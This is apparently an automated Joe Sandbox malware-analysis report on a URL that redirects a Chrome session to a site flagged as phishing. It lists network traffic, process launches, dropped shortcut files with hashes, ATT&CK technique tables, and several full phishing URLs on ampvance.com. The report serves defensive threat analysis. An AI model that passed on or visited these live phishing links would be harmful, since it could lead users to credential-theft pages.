          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.5:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.5:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49703 version: TLS 1.2
          Source: classification engineClassification label: mal72.phis.troj.win@21/40@18/8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 --field-trial-handle=2380,i,5816646671808704860,14953583853610875353,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 --field-trial-handle=2380,i,5816646671808704860,14953583853610875353,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 3.7.pages.csv, type: HTML
          Source: Yara matchFile source: 4.8.pages.csv, type: HTML
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          1
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/0%Avira URL Cloudsafe
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://ampvance.com/jq/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2b9100%Avira URL Cloudphishing
          https://ampvance.com/ASSETS/img/m_.svg100%Avira URL Cloudphishing
          https://ampvance.com/1100%Avira URL Cloudphishing
          https://ampvance.com/APP-3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee1/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee2100%Avira URL Cloudphishing
          https://ampvance.com/boot/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2bf100%Avira URL Cloudphishing
          https://ampvance.com/ASSETS/img/sig-op.svg100%Avira URL Cloudphishing
          https://ampvance.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=85fa6d536af119eb100%Avira URL Cloudphishing
          https://ampvance.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1869225531:1709641461:kuxJ_DvE-BzM62NrsAoJvN18Oo0XGBWfSTPIHUFJYAY/85fa6d536af119eb/a96d5f6b92698dc100%Avira URL Cloudphishing
          https://ampvance.com/js/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2c1100%Avira URL Cloudphishing
          https://ampvance.com/favicon.ico100%Avira URL Cloudphishing
          https://ampvance.com/x/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee7100%Avira URL Cloudphishing
          https://rfpcertstream.castlehillinfotech.com/favicon.ico0%Avira URL Cloudsafe
          https://ampvance.com/o/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cf01100%Avira URL Cloudphishing
          NameIPActiveMaliciousAntivirus DetectionReputation
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            high
            ampvance.com
            104.21.81.229
            truefalse
              unknown
              challenges.cloudflare.com
              104.17.2.184
              truefalse
                high
                www.google.com
                142.251.41.4
                truefalse
                  high
                  rfpcertstream.castlehillinfotech.com
                  172.105.184.142
                  truefalse
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.211.108
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/85fa6d617a504235/1709645077930/05ec081f2474c7b76f8a6c143f0f205ebf76eece6eeae1272067e1746485a5f2/-9pEA90tLAniFfrfalse
                        high
                        https://ampvance.com/jq/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2b9false
                        • Avira URL Cloud: phishing
                        unknown
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=85fa6d617a504235false
                          high
                          https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4#true
                            unknown
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normalfalse
                              high
                              https://a.nel.cloudflare.com/report/v3?s=Xmr%2BexqgQZuZn%2FurIC87BBzwJ9V5F9jLSZs6qa6uqe2ogtVUeJgOKLzpa1xSbF1k4KlypJ13JvGX2ytffNhC1lSDahGag%2BrXvgqVH2oAOO0L6eA%2Bb9EKs03tibfKPaU%3Dfalse
                                high
                                https://ampvance.com/ASSETS/img/m_.svgfalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://a.nel.cloudflare.com/report/v3?s=t2XtQZ7IrgLo%2B6%2FQ%2FlfV7NC4C7HNPD2jOpTEhnnufHBTudhN0Hsvy4fb8ExsQEQqOX0DCIHvg%2FXAPrQZ2RIqkIOId2e57I4UHShefTBnpBhck9eP%2F49f3%2FOfobYkaLY%3Dfalse
                                  high
                                  https://ampvance.com/APP-3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee1/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee2false
                                  • Avira URL Cloud: phishing
                                  unknown
                                  https://ampvance.com/1false
                                  • Avira URL Cloud: phishing
                                  unknown
                                  https://ampvance.com/favicon.icofalse
                                  • Avira URL Cloud: phishing
                                  unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/85fa6d617a504235/1709645077934/5cNZbzk38vkU6mlfalse
                                    high
                                    https://ampvance.com/boot/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2bffalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1183635583:1709641629:fYb9hZweqxu5iZMV1wvhRAEVl-boZlvEU6H59iz174E/85fa6d617a504235/e4bc76bcbb19b36false
                                      high
                                      https://ampvance.com/ASSETS/img/sig-op.svgfalse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://a.nel.cloudflare.com/report/v3?s=XceLM9%2F15QFyNV8EKMCmsRb2%2Fer2O9VN20vO500Khy7MY5nwL33D40mdULbbpHSMADWU1DQ6DoOuF%2FhlYEvM3ADJceuLowQQrxLvOJVZgbI6%2FuQ38D81pfFJlwIa1tk%3Dfalse
                                        high
                                        https://ampvance.com/js/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2c1false
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://ampvance.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=85fa6d536af119ebfalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                          high
                                          https://ampvance.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1869225531:1709641461:kuxJ_DvE-BzM62NrsAoJvN18Oo0XGBWfSTPIHUFJYAY/85fa6d536af119eb/a96d5f6b92698dcfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/false
                                            unknown
                                            https://rfpcertstream.castlehillinfotech.com/favicon.icofalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4true
                                              unknown
                                              https://ampvance.com/false
                                                unknown
                                                https://ampvance.com/x/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee7false
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://ampvance.com/o/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cf01false
                                                • Avira URL Cloud: phishing
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://getbootstrap.com/)chromecache_84.2.drfalse
                                                  high
                                                  https://github.com/twbs/bootstrap/graphs/contributors)chromecache_84.2.drfalse
                                                    high
                                                    https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_84.2.drfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      104.21.81.229
                                                      ampvance.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      104.17.3.184
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      239.255.255.250
                                                      unknownReserved
                                                      unknownunknownfalse
                                                      35.190.80.1
                                                      a.nel.cloudflare.comUnited States
                                                      15169GOOGLEUSfalse
                                                      172.105.184.142
                                                      rfpcertstream.castlehillinfotech.comUnited States
                                                      63949LINODE-APLinodeLLCUSfalse
                                                      104.17.2.184
                                                      challenges.cloudflare.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      142.251.41.4
                                                      www.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      IP
                                                      192.168.2.5
                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1403434
                                                      Start date and time:2024-03-05 14:23:36 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 3m 25s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:browseurl.jbs
                                                      Sample URL:https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:7
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal72.phis.troj.win@21/40@18/8
                                                      EGA Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 142.250.72.99, 142.250.80.78, 142.250.31.84, 34.104.35.123, 20.12.23.50, 104.117.182.73, 104.117.182.82, 104.117.182.81, 104.117.182.10, 192.229.211.108, 13.85.23.206, 20.242.39.171, 142.250.80.74, 142.250.80.106, 142.251.35.170, 142.251.40.106, 142.250.176.202, 142.251.40.170, 142.250.72.106, 142.250.65.170, 142.250.80.42, 142.250.80.10, 172.217.165.138, 142.251.40.202, 142.251.32.106, 142.251.40.234, 142.251.40.138, 142.251.41.10, 142.251.32.99
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                      • VT rate limit hit for: https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/
                                                      No simulations
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Mar 5 12:24:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2677
                                                      Entropy (8bit):3.9654005920022413
                                                      Encrypted:false
                                                      SSDEEP:48:8tdJTRJh+HUidAKZdA19ehwiZUklqehHMy+3:8pbDmMy
                                                      MD5:6072C077AD75BBE1A674BAB00A447727
                                                      SHA1:393E6756DE9CBDEB2E5FE4277371AA8C58EA7650
                                                      SHA-256:44D1BA5CC2EC6FBEC36960D0F5DFB3B09E4AB1D15347E47633DF4F365484BEA3
                                                      SHA-512:E917C8AD165320F609D08414061D5BC4A75488E81DBBDC21555EF8E7C2340C874F6EB765D2BD8255EBF9106FF9D17021A2D54221E8EF07FA0FD3F8197047D219
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,....3y.t.o..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IeX.k....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeX.k....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeX.k....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeX.k..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeX.k...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............6.8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Mar 5 12:24:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2679
                                                      Entropy (8bit):3.9827208925426327
                                                      Encrypted:false
                                                      SSDEEP:48:87dJTRJh+HUidAKZdA1weh/iZUkAQkqehWMy+2:8/bx9QBMy
                                                      MD5:FB4573E47E1B2E5550E6E6A1B3AE54BE
                                                      SHA1:5329F8187BD425F29B3E0C156F66F0E5B401CEBE
                                                      SHA-256:62611A16564F41F21696A17A6064CE7816EE915AA84D0C8AD1AA871B2FDEA140
                                                      SHA-512:5A1F690D85887DB37FBC7A51B53092C310527B51B64BC5F520E80CD63634C1F2E42DDE0CA586E9B534EA87267D4D5E4D405DDDBBB1CA2172C340EBC07F02C523
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,....2}.t.o..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IeX.k....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeX.k....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeX.k....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeX.k..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeX.k...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............6.8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2693
                                                      Entropy (8bit):3.999929034268522
                                                      Encrypted:false
                                                      SSDEEP:48:8xidJTRJsHUidAKZdA14tseh7sFiZUkmgqeh7sgMy+BX:8xgbdnqMy
                                                      MD5:AA89A1833ED8C214081AD0AC5E52EC01
                                                      SHA1:A3A3DA3093485C2CEAEF2B6796B97087A683B511
                                                      SHA-256:192D0F76946FAC258A1893CD2B45FB907126E52317822DBEE1FA98EABB880D3F
                                                      SHA-512:7C07155C5ED78AAA76CEA0923A5BF212B5C02E25D313F283CA91B1E0B8F4C8C4B2ED2B288EBF475EDCC2493D85A20FDC9468CEA29EDCE43A0CAC4EF06715946A
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IeX.k....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeX.k....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeX.k....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeX.k..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............6.8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
